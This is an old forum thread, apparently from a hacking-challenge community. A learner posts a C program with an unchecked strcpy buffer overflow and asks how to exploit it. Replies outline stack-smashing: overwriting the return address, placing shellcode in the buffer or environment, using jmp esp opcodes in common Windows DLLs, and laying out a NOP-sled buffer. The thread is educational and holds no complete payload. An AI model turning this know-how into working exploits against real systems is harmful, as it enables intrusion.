Author | Post | |||
beetleflux |
#include<string.h> int main(int argc, char **argv){ char buf[256]; strcpy(buf, argv[1]); } This code is vulnerable to buffer overflow. Im trying to learn about exploiting these kind of codes, so, I know its common to make it spawn a shell, but what would I input if I wanted to make the program print out "hello world" ? Is it A*256 cout<<"hello world" ? I know I have to overwrite the memory and such, but I dont know the details. Can someone explain to me how and why it it possible to exploit the code above ? |
|||
03.06.2006 16:37:17 |
|
|||
belo |
Well, the point of the buffer overflow is to overwrite the return address in the stack. The return address is used when the function returns and is an address of the next instruction to execute in the calling function. But if u change the value of the return address, you can execute any code you want (granted u have enough place to store it). Basically, u filled the buffer with ur shellcode (which is only executable code, compiled asm if u want (if i'm not mistaken)), then u add some padding to overwrite what u don't want and then u finally replace the return address so that it points to the code in the buffer. The only thing i don't get is how can u know the correct address to use for the return address ? |
|||
03.06.2006 17:24:08 |
|
|||
theblacksheep |
If you write local exploits you can often use the environment to store your shellcode. Never kernels use some randomization but in older ones you can calculate the exact address. The second method is to use the buffer you overwrite for storing your shellcode. Then you have to guess a little bit where exactly it is located. tbs PS: Usually the first thing you do is writing a "Hello World" programm but you should start your exploiting career with spawning a shell. |
|||
Edited by theblacksheep on 03.06.2006 18:41:56 | ||||
03.06.2006 18:39:03 |
|
|||
miStycaL [none yet] |
Hi In a windows OS, you can try it put some junk until reach EIP, debug you vulnerable program with Olly and start put some A's until you fill you EIP with the A's. Then you will need 2 things , a shellcode and a return address In windows, you can't use a static address in your stack. To make your exploit more 'stable' you will need jump(return ) to a location first and then jump to stack. You can use a opcode jmp esp,call esp, or push esp ret for it You can use a address of one of this opcodes, I sujest you use a address of one that is located in a very common dll, like kernel32, User32, msvcrt , or inside your vulnerable program. You can use some softwares to search for this opcode you can use SAC,and if you don't want use SAC you can user my own opcode finder, if you want, send me a pm, ADMIN if you can put it in bright-shadows download section I will be a happy girl then you buffer layout will like it <junk> <EIP> <Some NOPs> <Here you will be happy> aaaaaaaaaaaaaaaaaaaaaaaaaa[Jmp esp]\x90\x90\x90\x90\x90\x90\x90[Shellcode] then make a program that make this buffer and send the buffer to the program I hope it helps you |
|||
04.06.2006 04:05:57 |
|
|||
DevAstatoR |
Try the book "forbidden code" from Jon Erickson |
|||
14.09.2006 10:36:44 |
|
|||
unknown user |
yeah this really is a larger topic than we could cover in a forum thread... to find opcodes on a linux, box which might also be the case. you could use this command objdump /bin/*|grep -i [mnemonic] it's quick and dirty just the way i like it |
|||
17.09.2006 01:32:44 |
|